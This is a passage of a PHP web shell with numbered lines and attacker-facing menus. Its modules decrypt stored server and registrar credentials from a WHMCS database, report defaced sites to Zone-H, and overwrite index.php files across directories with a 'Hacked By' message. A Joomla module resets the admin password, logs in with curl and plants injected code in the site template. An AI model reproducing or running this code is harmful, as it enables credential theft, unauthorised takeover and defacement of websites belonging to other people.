  2081. echo '</td></tr><br>';
  2082. echo '<tr><th colspan="2">Hasil Hash</th></center></tr>';
  2083. echo '<tr><td>Original Password</td><td><input class=inputz type=text size=50 value='.$pass.'></td></tr><br><br>';
  2084. echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value='.$hash.'></td></tr><br><br>';
  2085. echo '<tr><td>MD4</td><td><input class=inputz type=text size=50 value='.$md4.'></td></tr><br><br>';
  2086. echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value='.$hash_md5.'></td></tr><br><br>';
  2087. echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value='.$hash_md5_double.'></td></tr><br><br>';
  2088. echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value='.$hash1.'></td></tr><br><br>';
  2089. echo '<tr><td>Sha256</td><td><input class=inputz type=text size=50 value='.$sha256.'></td></tr><br><br>';
  2090. echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value='.$hash1_sha1.'></td></tr><br><br>';
  2091. echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value='.$hash1_sha1_double.'></td></tr><br><br></table>';
  2092. }
  2093.  
  2094. /////////////////////////////////////////////////////////////////
  2095. elseif(isset($_GET['x']) && ($_GET['x'] == 'whmcs'))
  2096. {
  2097. ?>
  2098. <form action="?y=<?php echo $pwd; ?>&amp;x=whmcs" method="post">
  2099.  
  2100. <?php
  2101.  
  2102. function decrypt ($string,$cc_encryption_hash)
  2103. {
  2104. $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  2105. $hash_key = _hash ($key);
  2106. $hash_length = strlen ($hash_key);
  2107. $string = base64_decode ($string);
  2108. $tmp_iv = substr ($string, 0, $hash_length);
  2109. $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  2110. $iv = $out = '';
  2111. $c = 0;
  2112. while ($c < $hash_length)
  2113. {
  2114. $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  2115. ++$c;
  2116. }
  2117. $key = $iv;
  2118. $c = 0;
  2119. while ($c < strlen ($string))
  2120. {
  2121. if (($c != 0 AND $c % $hash_length == 0))
  2122. {
  2123. $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  2124. }
  2125. $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  2126. ++$c;
  2127. }
  2128. return $out;
  2129. }
  2130.  
  2131. function _hash ($string)
  2132. {
  2133. if (function_exists ('sha1'))
  2134. {
  2135. $hash = sha1 ($string);
  2136. }
  2137. else
  2138. {
  2139. $hash = md5 ($string);
  2140. }
  2141. $out = '';
  2142. $c = 0;
  2143. while ($c < strlen ($hash))
  2144. {
  2145. $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  2146. $c += 2;
  2147. }
  2148. return $out;
  2149. }
  2150.  
  2151. echo "
  2152. <br><center><font size='5' color='#FFFFFF'><b>-=[ WHMCS Decoder ]=-</b></font></center>
  2153. <center>
  2154. <br>
  2155.  
  2156. <FORM action='' method='post'>
  2157. <input type='hidden' name='form_action' value='2'>
  2158. <br>
  2159. <table class=tabnet style=width:320px;padding:0 1px;>
  2160. <tr><th colspan=2>WHMCS Decoder</th></tr>
  2161. <tr><td>db_host </td><td><input type='text' style='color:#FFFFFF;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
  2162. <tr><td>db_username </td><td><input type='text' style='color:#FFFFFF;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
  2163. <tr><td>db_password</td><td><input type='text' style='color:#FFFFFF;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
  2164. <tr><td>db_name</td><td><input type='text' style='color:#FFFFFF;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
  2165. <tr><td>cc_encryption_hash</td><td><input style='color:#FFFFFF;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
  2166. <td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#FFFFFF;background-color:' value='Submit' name='Submit'></td>
  2167. </table>
  2168. </FORM>
  2169. </center>
  2170. ";
  2171.  
  2172. if($_POST['form_action'] == 2 )
  2173. {
  2174. //include($file);
  2175. $db_host=($_POST['db_host']);
  2176. $db_username=($_POST['db_username']);
  2177. $db_password=($_POST['db_password']);
  2178. $db_name=($_POST['db_name']);
  2179. $cc_encryption_hash=($_POST['cc_encryption_hash']);
  2180.  
  2181.  
  2182.  
  2183. $link=mysql_connect($db_host,$db_username,$db_password) ;
  2184. mysql_select_db($db_name,$link) ;
  2185. $query = mysql_query("SELECT * FROM tblservers");
  2186. while($v = mysql_fetch_array($query)) {
  2187. $ipaddress = $v['ipaddress'];
  2188. $username = $v['username'];
  2189. $type = $v['type'];
  2190. $active = $v['active'];
  2191. $hostname = $v['hostname'];
  2192. echo("<center><table border='1'>");
  2193. $password = decrypt ($v['password'], $cc_encryption_hash);
  2194. echo("<tr><td>Type</td><td>$type</td></tr>");
  2195. echo("<tr><td>Active</td><td>$active</td></tr>");
  2196. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
  2197. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
  2198. echo("<tr><td>Username</td><td>$username</td></tr>");
  2199. echo("<tr><td>Password</td><td>$password</td></tr>");
  2200.  
  2201. echo "</table><br><br></center>";
  2202. }
  2203.  
  2204. $link=mysql_connect($db_host,$db_username,$db_password) ;
  2205. mysql_select_db($db_name,$link) ;
  2206. $query = mysql_query("SELECT * FROM tblregistrars");
  2207. echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
  2208. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
  2209. while($v = mysql_fetch_array($query)) {
  2210. $registrar = $v['registrar'];
  2211. $setting = $v['setting'];
  2212. $value = decrypt ($v['value'], $cc_encryption_hash);
  2213. if ($value=="") {
  2214. $value=0;
  2215. }
  2216. $password = decrypt ($v['password'], $cc_encryption_hash);
  2217. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
  2218. }
  2219. }
  2220. }
  2221.  
  2222. elseif(isset($_GET['x']) && ($_GET['x'] == 'zone'))
  2223. {
  2224. ?>
  2225. <form action="?y=<?php echo $pwd; ?>&amp;x=zone" method="post">
  2226.  
  2227. <br><br><center>
  2228. <!-- Zone-H -->
  2229. <form action="" method='POST'><table><table class='tabnet'><tr>
  2230. <td style='background-color:#0000;padding-left:10px;'><tr><tr><th colspan="2"><h2>Zone-H Defacer</h2></th></tr></td></tr><tr><td height='45' colspan='2'><form method="post">
  2231. <input type="text" class="inputz" name="defacer" value="Nama Defacer" />
  2232. <select name="hackmode" class="inputz" >
  2233. <option >------------------------Pilih Salah Satu------------------------</option>
  2234. <option value="1">known vulnerability (i.e. unpatched system)</option>
  2235. <option value="2" >undisclosed (new) vulnerability</option>
  2236. <option value="3" >configuration / admin. mistake</option>
  2237. <option value="4" >brute force attack</option>
  2238. <option value="5" >social engineering</option>
  2239. <option value="6" >Web Server intrusion</option>
  2240. <option value="7" >Web Server external module intrusion</option>
  2241. <option value="8" >Mail Server intrusion</option>
  2242. <option value="9" >FTP Server intrusion</option>
  2243. <option value="10" >SSH Server intrusion</option>
  2244. <option value="11" >Telnet Server intrusion</option>
  2245. <option value="12" >RPC Server intrusion</option>
  2246. <option value="13" >Shares misconfiguration</option>
  2247. <option value="14" >Other Server intrusion</option>
  2248. <option value="15" >SQL Injection</option>
  2249. <option value="16" >URL Poisoning</option>
  2250. <option value="17" >File Inclusion</option>
  2251. <option value="18" >Other Web Application bug</option>
  2252. <option value="19" >Remote administrative panel access bruteforcing</option>
  2253. <option value="20" >Remote administrative panel access password guessing</option>
  2254. <option value="21" >Remote administrative panel access social engineering</option>
  2255. <option value="22" >Attack against administrator(password stealing/sniffing)</option>
  2256. <option value="23" >Access credentials through Man In the Middle attack</option>
  2257. <option value="24" >Remote service password guessing</option>
  2258. <option value="25" >Remote service password bruteforce</option>
  2259. <option value="26" >Rerouting after attacking the Firewall</option>
  2260. <option value="27" >Rerouting after attacking the Router</option>
  2261. <option value="28" >DNS attack through social engineering</option>
  2262. <option value="29" >DNS attack through cache poisoning</option>
  2263. <option value="30" >Not available</option>
  2264. </select>
  2265.  
  2266. <select name="reason" class="inputz" >
  2267. <option >-------------Pilih Salah Satu---------------</option>
  2268. <option value="1" >Heh...just for fun!</option>
  2269. <option value="2" >Revenge against that website</option>
  2270. <option value="3" >Political reasons</option>
  2271. <option value="4" >As a challenge</option>
  2272. <option value="5" >I just want to be the best defacer</option>
  2273. <option value="6" >Patriotism</option>
  2274. <option value="7" >Not available</option>
  2275. </select>
  2276. <input type="hidden" name="action" value="zone">
  2277. <center><textarea style="background:black;outline:none;" name="domain" cols="116" rows="9" id="domains">List Of Domains</textarea>
  2278. <br /><input class='inputzbut' type="submit" value="Send Now !" name="SendNowToZoneH" /><br></center></table>
  2279. </form></td></tr></table></form>
  2280. <!-- End Of Zone-H -->
  2281. </td></center><br><br>
  2282.  
  2283. <?php
  2284. echo '<center>';
  2285. ob_start();
  2286. $sub = get_loaded_extensions();
  2287. if(!in_array("curl", $sub)){die('[-] Curl Is Not Supported !! ');}
  2288. $hacker = $_POST['defacer'];
  2289. $method = $_POST['hackmode'];
  2290. $neden = $_POST['reason'];
  2291. $site = $_POST['domain'];
  2292.  
  2293. if (empty($hacker)){die ("[-] You Must Fill the Attacker name !");}
  2294. elseif($method == "--------SELECT--------") {die("[-] You Must Select The Method !");}
  2295. elseif($neden == "--------SELECT--------") {die("[-] You Must Select The Reason");}
  2296. elseif(empty($site)) {die("[-] You Must Inter the Sites List ! ");}
  2297. $i = 0;
  2298. $sites = explode("\n", $site);
  2299. while($i < count($sites))
  2300. {
  2301. if(substr($sites[$i], 0, 4) != "http") {$sites[$i] = "http://".$sites[$i];}
  2302. ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
  2303. echo "Site : ".$sites[$i]." Defaced !\n";
  2304. ++$i;
  2305. }
  2306. echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";
  2307.  
  2308. echo '</center>';
  2309. }
  2310.  
  2311. /////////////////////////////////////////////////////////////////////////////////////////////
  2312.  
  2313.  
  2314. //////////////////////////////////////////////////////////////////////////////////////////////
  2315.  
  2316. elseif(isset($_GET['x']) && ($_GET['x'] == 'hashid')) {
  2317. if(isset($_POST['gethash'])){
  2318. $hash = $_POST['hash'];
  2319. if(strlen($hash)==32){
  2320. $hashresult = "MD5 Hash";
  2321. }elseif(strlen($hash)==40){
  2322. $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
  2323. }elseif(strlen($hash)==13){
  2324. $hashresult = "DES(Unix) Hash";
  2325. }elseif(strlen($hash)==16){
  2326. $hashresult = "MySQL Hash / /DES(Oracle Hash)";
  2327. }elseif(strlen($hash)==41){
  2328. $GetHashChar = substr($hash, 40);
  2329. if($GetHashChar == "*"){
  2330. $hashresult = "MySQL5 Hash";
  2331. }
  2332. }elseif(strlen($hash)==64){
  2333. $hashresult = "SHA-256 Hash";
  2334. }elseif(strlen($hash)==96){
  2335. $hashresult = "SHA-384 Hash";
  2336. }elseif(strlen($hash)==128){
  2337. $hashresult = "SHA-512 Hash";
  2338. }elseif(strlen($hash)==34){
  2339. if(strstr($hash, '$1$')){
  2340. $hashresult = "MD5(Unix) Hash";
  2341. }
  2342. }elseif(strlen($hash)==37){
  2343. if(strstr($hash, '$apr1$')){
  2344. $hashresult = "MD5(APR) Hash";
  2345. }
  2346. }elseif(strlen($hash)==34){
  2347. if(strstr($hash, '$H$')){
  2348. $hashresult = "MD5(phpBB3) Hash";
  2349. }
  2350. }elseif(strlen($hash)==34){
  2351. if(strstr($hash, '$P$')){
  2352. $hashresult = "MD5(Wordpress) Hash";
  2353. }
  2354. }elseif(strlen($hash)==39){
  2355. if(strstr($hash, '$5$')){
  2356. $hashresult = "SHA-256(Unix) Hash";
  2357. }
  2358. }elseif(strlen($hash)==39){
  2359. if(strstr($hash, '$6$')){
  2360. $hashresult = "SHA-512(Unix) Hash";
  2361. }
  2362. }elseif(strlen($hash)==24){
  2363. if(strstr($hash, '==')){
  2364. $hashresult = "MD5(Base-64) Hash";
  2365. }
  2366. }else{
  2367. $hashresult = "Hash type not found";
  2368. }
  2369. }else{
  2370. $hashresult = "Not Hash Entered";
  2371. }
  2372.  
  2373. ?>
  2374. <center><br><Br><br>
  2375.  
  2376. <form action="" method="POST">
  2377. <tr>
  2378. <table class="tabnet">
  2379. <th colspan="5">Hash Identification</th>
  2380. <tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td> <td><input type="text" name="hash" size='60' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>
  2381. <tr class="optionstr"><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
  2382. </table></tr></form>
  2383. </center>
  2384.  
  2385. <?php
  2386. }
  2387.  
  2388. //////////////////////////////////////////////////////////////////////////////////////////////
  2389. elseif(isset($_GET['x']) && ($_GET['x'] == 'string')){
  2390. $text = $_POST['code'];
  2391. ?><center><br><br><b>+--=[ Script Encode & Decode ]=--+</b><br><br>
  2392. <form method="post"><br><br><br>
  2393. <textarea class='inputz' cols=80 rows=10 name="code"></textarea><br><br>
  2394. <select class='inputz' size="1" name="ope">
  2395. <option value="urlencode">url</option>
  2396. <option value="base64">Base64</option>
  2397. <option value="ur">convert_uu</option>
  2398. <option value="json">json</option>
  2399. <option value="gzinflates">gzinflate - base64</option>
  2400. <option value="str2">str_rot13 - base64</option>
  2401. <option value="gzinflate">str_rot13 - gzinflate - base64</option>
  2402. <option value="gzinflater">gzinflate - str_rot13 - base64</option>
  2403. <option value="gzinflatex">gzinflate - str_rot13 - gzinflate - base64</option>
  2404. <option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>
  2405. <option value="url">base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
  2406. <option value="gzpress">gzcompress - base64</option>
  2407. </select>&nbsp;<input class='inputzbut' type='submit' name='submit' value='Encrypt'>
  2408. <input class='inputzbut' type='submit' name='submits' value='Decrypt'>
  2409. </form>
  2410.  
  2411. <?php
  2412. $submit = $_POST['submit'];
  2413. if (isset($submit)){
  2414. $op = $_POST["ope"];
  2415.  
  2416. switch ($op) {case 'base64': $codi=base64_encode($text);
  2417. break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
  2418. break;case 'json' : $codi=json_encode(utf8_encode($text));
  2419. break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
  2420. break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
  2421. break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
  2422. break;case 'gzinflatew' : $codi=base64_encode(gzdeflate(str_rot13(rawurlencode(gzdeflate(convert_uuencode(base64_encode(str_rot13(gzdeflate(convert_uuencode(rawurldecode(str_rot13($text))))))))))));
  2423. break;case 'gzinflates' : $codi=base64_encode(gzdeflate($text));
  2424. break;case 'str2' : $codi=base64_encode(str_rot13($text));
  2425. break;case 'urlencode' : $codi=rawurlencode($text);
  2426. break;case 'ur' : $codi=convert_uuencode($text);
  2427. break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
  2428. break;case 'gzpress' : $codi=base64_encode(gzcompress($text));
  2429. break;default:break;}}
  2430. $submit = $_POST['submits'];
  2431. if (isset($submit)){
  2432. $op = $_POST["ope"];
  2433. switch ($op) {case 'base64': $codi=base64_decode($text);
  2434. break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
  2435. break;case 'json' : $codi=utf8_decode(json_decode($text));
  2436. break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
  2437. break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
  2438. break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
  2439. break;case 'gzinflatew' : $codi=str_rot13(rawurldecode(convert_uudecode(gzinflate(str_rot13(base64_decode(convert_uudecode(gzinflate(rawurldecode(str_rot13(gzinflate(base64_decode($text))))))))))));
  2440. break;case 'gzinflates' : $codi=gzinflate(base64_decode($text));
  2441. break;case 'str2' : $codi=str_rot13(base64_decode($text));
  2442. break;case 'urlencode' : $codi=rawurldecode($text);
  2443. break;case 'ur' : $codi=convert_uudecode($text);
  2444. break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
  2445. break;case 'gzpress' : $codi=gzuncompress(base64_decode($text));
  2446. break;default:break;}}
  2447.  
  2448. echo '<textarea cols=80 rows=10 class="inputz" readonly>'.$codi.'</textarea></center><BR><BR>';
  2449.  
  2450. }
  2451.  
  2452. /////////////////////////////////////////////////////////////////////////////////////////////
  2453.  
  2454. elseif(isset($_GET['x']) && ($_GET['x'] == 'mass'))
  2455. {
  2456. echo "<center/><br/><b><font color=#FFFFFF>-=[ Mass Deface ]=-</font></b><br>";
  2457. error_reporting(0);?>
  2458. <form ENCTYPE="multipart/form-data" action="<?php $_SERVER['PHP_SELF']?>" method='post'>
  2459. <td><table><table class="tabnet" >
  2460. <form hethot='post'>
  2461. <tr>
  2462. <tr>
  2463. <td>&nbsp;&nbsp;Folder</td><td><input class ='inputz' type='text' name='path' size='60' value="<?php echo getcwd();?>"></td>
  2464. </tr><br>
  2465. <tr>
  2466. <td>file name</td><td><input class ='inputz' type='text' name='file' size='60' value="index.php"></td>
  2467. </tr>
  2468. </tr>
  2469. <th colspan='2'><b>Index code</b></th><br></table>
  2470. <textarea style='background:black;outline:none;' name='index' rows='10' cols='67'>Hacked By Mr.Holix196</textarea><br>
  2471. <center><input class='inputzbut' type='submit' value="&nbsp;&nbsp;Deface&nbsp;&nbsp;"></center></form></table><br></form>
  2472.  
  2473. <?php $mainpath=$_POST[path];$file=$_POST[file];$dir=opendir("$mainpath");$code=base64_encode($_POST[index]);$indx=base64_decode($code);while($row=readdir($dir)){$start=@fopen("$row/$file","w+");$finish=@fwrite($start,$indx);if ($finish){echo "$row/$file > Done<br><br>";}}}
  2474.  
  2475.  
  2476. //////////////////////////////////////////////////////////////////////////////////////////////
  2477.  
  2478.  
  2479.  
  2480. /////////////////////////////////////////////////////////////////////////////////////////////
  2481.  
  2482.  
  2483. elseif(isset($_GET['x']) && ($_GET['x'] == 'jodexer'))
  2484. {
  2485. ?>
  2486. <form action="?y=<?php echo $pwd; ?>&amp;x=jodexer" method="post">
  2487.  
  2488. <?php
  2489.  
  2490. function randomt() {
  2491.  
  2492. $chars = "abcdefghijkmnopqrstuvwxyz023456789";
  2493. srand((double)microtime()*1000000);
  2494. $i = 0;
  2495. $pass = '' ;
  2496.  
  2497. while ($i <= 7) {
  2498. $num = rand() % 33;
  2499. $tmp = substr($chars, $num, 1);
  2500. $pass = $pass . $tmp;
  2501. $i++;
  2502. }
  2503.  
  2504. return $pass;
  2505.  
  2506. }
  2507. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)
  2508. {
  2509. $ar0=explode($marqueurDebutLien, $text);
  2510. $ar1=explode($marqueurFinLien, $ar0[$i]);
  2511. $ar=trim($ar1[0]);
  2512. return $ar;
  2513. }
  2514. if ($_POST['form_action'])
  2515. {
  2516.  
  2517. $text=file_get_contents($_POST['file']);
  2518. $username=entre2v2($text,"public $user = '","';");
  2519. $password=entre2v2($text,"public $password = ', '","';");
  2520. $dbname=entre2v2($text,"public $db = ', '","';");
  2521. $dbprefix=entre2v2($text,"public $dbprefix = '","';");
  2522. $site_url=($_POST['site_url']);
  2523.  
  2524. $h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['code']))))."'))); exit; ?>";
  2525.  
  2526. $co=randomt();
  2527. /*
  2528. echo($username);
  2529. echo("<br>");
  2530. echo($password);
  2531. echo("<br>");
  2532. echo($dbname);
  2533. echo("<br>");
  2534. echo($dbprefix);
  2535. echo("<br>");
  2536. */
  2537. $co=randomt();
  2538.  
  2539. if ($_POST['form_action'])
  2540. {
  2541. $h="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($_POST['code']))))."'))); exit; ?>";
  2542.  
  2543.  
  2544.  
  2545.  
  2546.  
  2547. $link=mysql_connect("dzoed.druknet.bt",$username,$password) ;
  2548.  
  2549. mysql_select_db($dbname,$link) ;
  2550.  
  2551. $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'");
  2552. echo("<br>[+] Changing admin password to 123456789");
  2553.  
  2554. $req =mysql_query("SELECT * from `".$dbprefix."extensions` ");
  2555.  
  2556. if ( $req )
  2557. {
  2558. #################################################################
  2559. ###################### V1.6 ######################
  2560. #################################################################
  2561.  
  2562.  
  2563. $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
  2564. $data = mysql_fetch_array($req);
  2565. $template_name=$data["template"];
  2566.  
  2567. $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
  2568. $data = mysql_fetch_array($req);
  2569. $template_id=$data["extension_id"];
  2570.  
  2571. $url2=$site_url."/index.php";
  2572.  
  2573. $ch = curl_init();
  2574. curl_setopt($ch, CURLOPT_URL, $url2);
  2575. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2576. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  2577. curl_setopt($ch, CURLOPT_HEADER, 1);
  2578. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2579. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  2580. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  2581.  
  2582.  
  2583. $buffer = curl_exec($ch);
  2584.  
  2585. $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
  2586. $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
  2587.  
  2588. ///////////////////////////
  2589. $url2=$site_url."/index.php";
  2590. $ch = curl_init();
  2591. curl_setopt($ch, CURLOPT_URL, $url2);
  2592. curl_setopt($ch, CURLOPT_POST, 1);
  2593. curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");
  2594. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2595. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  2596. curl_setopt($ch, CURLOPT_HEADER, 0);
  2597. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2598. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  2599. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  2600. $buffer = curl_exec($ch);
  2601.  
  2602. $pos = strpos($buffer,"com_config");
  2603. if($pos === false) {
  2604. echo("<br>[-] Login Error");
  2605. exit;
  2606. }
  2607. else {
  2608. echo("<br>[~] Login Successful");
  2609. }
  2610. ///////////////////////////
  2611. $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
  2612. $ch = curl_init();
  2613. curl_setopt($ch, CURLOPT_URL, $url2);
  2614. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2615. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  2616. curl_setopt($ch, CURLOPT_HEADER, 0);
  2617. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2618. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  2619. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  2620. $buffer = curl_exec($ch);
  2621.  
  2622. $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
  2623. if($hidden2) {
  2624. echo("<br>[+] index.php file founded in Theme Editor");
  2625. }
  2626. else {
  2627. echo("<br>[-] index.php Not found in Theme Editor");
  2628. exit;
  2629. }
  2630. echo("<br>[*] Updating Index.php .....");
  2631. $url2=$site_url."/index.php?option=com_templates&layout=edit";
  2632.  
  2633. $ch = curl_init();
  2634. curl_setopt($ch, CURLOPT_URL, $url2);
  2635. curl_setopt($ch, CURLOPT_POST, 1);
  2636. curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
  2637.  
  2638. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2639. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  2640. curl_setopt($ch, CURLOPT_HEADER, 0);
  2641. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2642. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  2643. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  2644. $buffer = curl_exec($ch);
  2645.  
  2646. $pos = strpos($buffer,'<dd class="message message">');
  2647. if($pos === false) {
  2648. echo("<br>[-] Updating Index.php Error");
  2649. exit;
  2650. }
  2651. else {
  2652. echo("<br>[~] index.php successfully saved");
  2653. }
  2654. #################################################################
  2655. ###################### V1.6 END ######################
  2656. #################################################################
  2657.  
  2658.  
  2659. }
  2660. else
  2661. {
  2662.  
  2663. #################################################################
  2664. ###################### V1.5 ######################
  2665. #################################################################
  2666.  
  2667. $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
  2668. $data = mysql_fetch_array($req);
  2669. $template_name=$data["template"];
  2670.  
  2671. $url2=$site_url."/index.php";
  2672. $ch = curl_init();
  2673. curl_setopt($ch, CURLOPT_URL, $url2);
  2674. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2675. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  2676. curl_setopt($ch, CURLOPT_HEADER, 1);
  2677. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2678. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  2679. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  2680. $buffer = curl_exec($ch);
  2681.  
  2682. $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
  2683.  
  2684. $url2=$site_url."/index.php";
  2685. $ch = curl_init();
  2686. curl_setopt($ch, CURLOPT_URL, $url2);
  2687. curl_setopt($ch, CURLOPT_POST, 1);
  2688. curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&".$hidden."=1");
  2689. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2690. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  2691. curl_setopt($ch, CURLOPT_HEADER, 0);
  2692. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2693. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  2694. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  2695. $buffer = curl_exec($ch);
  2696.  
  2697. $pos = strpos($buffer,"com_config");
  2698.  
  2699. if($pos === false) {
  2700. echo("<br>[-] Login Error");
  2701. exit;
  2702. }
  2703. else {
  2704. echo("<br>[+] Login Successful");
  2705. }
  2706. ///////////////////////////
  2707. $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
  2708. $ch = curl_init();
  2709. curl_setopt($ch, CURLOPT_URL, $url2);
  2710. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2711. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  2712. curl_setopt($ch, CURLOPT_HEADER, 0);
  2713. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2714. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  2715. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  2716. $buffer = curl_exec($ch);
  2717.  
  2718. $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
  2719.  
  2720. if($hidden2) {
  2721. echo("<br>[~] index.php file founded in Theme Editor");
  2722. }
  2723. else {
  2724. echo("<br>[-] index.php Not found in Theme Editor");
  2725. }
  2726.  
  2727. echo("<br>[*] Updating Index.php .....");
  2728. $url2=$site_url."/index.php?option=com_templates&layout=edit";
  2729. $ch = curl_init();
  2730. curl_setopt($ch, CURLOPT_URL, $url2);
  2731. curl_setopt($ch, CURLOPT_POST, 1);
  2732. curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
  2733. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2734. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  2735. curl_setopt($ch, CURLOPT_HEADER, 0);
  2736. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  2737. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  2738. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  2739. $buffer = curl_exec($ch);
  2740.  
  2741. $pos = strpos($buffer,'<dd class="message message fade">');
  2742. if($pos === false) {
  2743. echo("<br>[-] Updating Index.php Error");
  2744. exit;
  2745. }
  2746. else {
  2747. echo("<br>[~] index.php successfully saved");
  2748. }
  2749. #################################################################
  2750. ###################### V1.5 END ######################
  2751. #################################################################
  2752.  
  2753. }
  2754.  
  2755. }
  2756.  
  2757.  
  2758. function randomt() {
  2759.  
  2760. $chars = "abcdefghijkmnopqrstuvwxyz023456789";
  2761. srand((double)microtime()*1000000);
  2762. $i = 0;
  2763. $pass = '' ;
  2764.  
